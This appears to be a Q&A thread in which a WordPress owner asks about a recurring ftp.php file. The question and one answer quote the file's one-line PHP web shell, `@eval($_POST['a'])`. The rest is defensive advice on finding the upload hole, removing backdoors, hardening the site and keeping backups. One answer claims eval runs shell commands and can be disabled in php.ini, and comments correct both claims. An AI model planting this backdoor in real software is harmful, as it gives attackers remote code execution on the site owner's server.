# Hacker leaves ftp.php

Tags: php, wordpress, security, ftp

It appears as if a couple of my wordpress sites keep getting hacked. I have WordFence installed and have changed my passwords ect. but a file called http://ftp.php keeps getting uploaded to my “uploads”-folder.

It contains this:

```
<?php
echo '123.txt';
?>
<?php @eval($_POST['a']);?>
```

What does this do? Any idead how to get rid of this? I havn’t experienced any other issues on the blog besides this file.

Comment: You probably have a vulnerable plugin or some of your site has been modified to recreate this file. Disable all plugins, reinstall your theme, and reinstall the WordPress core.

Answer (score 2):

*Just a bit of advice to help you get started, if he's already had access to your server, you need to do a lot more than just patch the original security hole he exploited.*

**1]** You need to determine how he's uploading his file and prevent him from doing so. If there is a form on your web site that does not validate the data (by using sanitize_key() or an equivalent) then he could very well be injecting his code that way. Ensure that all user input on your site is being sanitized, double check everything, plug-ins, your own code, etc.

**2]** Has he gained access on the server level? Has he merely gained access to your Wordpress back-end? If he's had FTP or similar access to your site, and I mean EVER hacked in and had it, you need to make sure he has not set up a back-door of some kind. When you say you've changed your log-ins, and that he has still managed to re-upload his file, that is indicative of a back-door. If it's not a backdoor, then he's just re-using whatever security vulnerability he used to gain access the first time. It would be a very good idea to check all over your server to make sure he hasen't inserted a rogue PHP file somewhere that allows him to re-execute code. If you have a clean back-up of your server files from before he gained access, wipe your server and re-upload your clean copy. You need to clean up after him in order to stay one step ahead.

**3]** Determine the vulnerability he's exploiting to gain access to your site. If all of your user input on the site is being sanitized, and you are confident he hasn't set up a backdoor, you need to start logging everything, and checking your logs if/when this happens again. If you cannot prevent him from accessing the server, you need to catch him doing it so you can better understand what he has access to and how he's accessing it. For all you know, this guy could have shell access by now, and not even be logging in through FTP or Wordpress anymore. You really need to do your due diligence, and figure out where your leaks are. Then patch them.

**4]** Be realistic and humble. If you find he has infiltrated too far for your experience to handle, talk to your hosting provider, and tell them about the situation. It's ok to ask them for help, that is what they are there for. Believe me, the last thing they want is a hacker rooting around their precious servers. They probably already have logs of him accessing the server, and may even be able to help you get his IP address. At the very least, they should be able to assist you in keeping him out if he's accessing your site on the server level.

**5]** If you manage to get him out, you need to ensure you have plugged all the leaks in your Wordpress installation. All data needs to be sanitized, ensure there are no rogue files on your server, use as few plugins as possible (they present more opportunities for security holes you don't know about yet), and ensure you have strong passwords that are not easy to brute force. It's also a good idea to keep logging everything you can so that you have something to refer to when things like this happen. The more difficult you make it for him to access your server, the more likely he is to move on to an easier target. The best offense against hackers is a good defense.

*You might find this article from the Wordpress Codex informative: http://codex.wordpress.org/Hardening_WordPress*

**6]** BACK UP YOUR FILES AND DATABASES. NOW. Once you have taken care of all this, it's a very good idea to back-up everything you have on your server if you haven't already. You need to realize that this hacker *could* have been a complete jerk, and just deleted everything. Once you know your files are clean and your server is hacker free, back...up...EVERYTHING. Back up your databases as well. You should be doing it weekly at least, depending on how often you update your site, and store the back-ups on a different server. If you really want to be smart, make a third backup on your local machine. The more the merrier, because you do not want to be find yourself in a position where you have to start from scratch because a hacker decided to delete all of your files.

Best of luck, and keep us posted if you have any updates. We may be able to give you more specific and better advice.

Answer (score 0):

"eval" is a evil function! The function makes it possible to execute a command on the server.

The command comes from the `$_POST['a']`.

Following example:

A hacker write a HTML based formular with a simple textbox and a submit button.
The content of the textbox (in this case `$_POST['a']`) will be send to your PHP File.

The PHP files see:

```
<?php @eval($_POST['a']);?>
```

That's the function to execute a command. The content from `$_POST['a']` could be `ls -la` to recive the current directoy & file structure - a simple linux command.

See http://php.net/manual/en/function.eval.php for more.

How could you prevent against that function?

For that evil function use `disable_function` derective in your php.ini!

http://php.net/manual/en/ini.core.php#ini.disable-functions

Comment: In this case ls -la won't be a useful command, because output is disabled via @. So the hacker has no access to the return value.

Comment: "The content from $_POST['a'] could be ls -la to recive the current directoy & file structure - a simple linux command." `eval` executes PHP code, not directly system commands. Though the hacker could `eval` an `exec` command.

Comment: You can't disable [`eval`](http://php.net/manual/en/function.eval.php) via disabled functions because it is a language construct.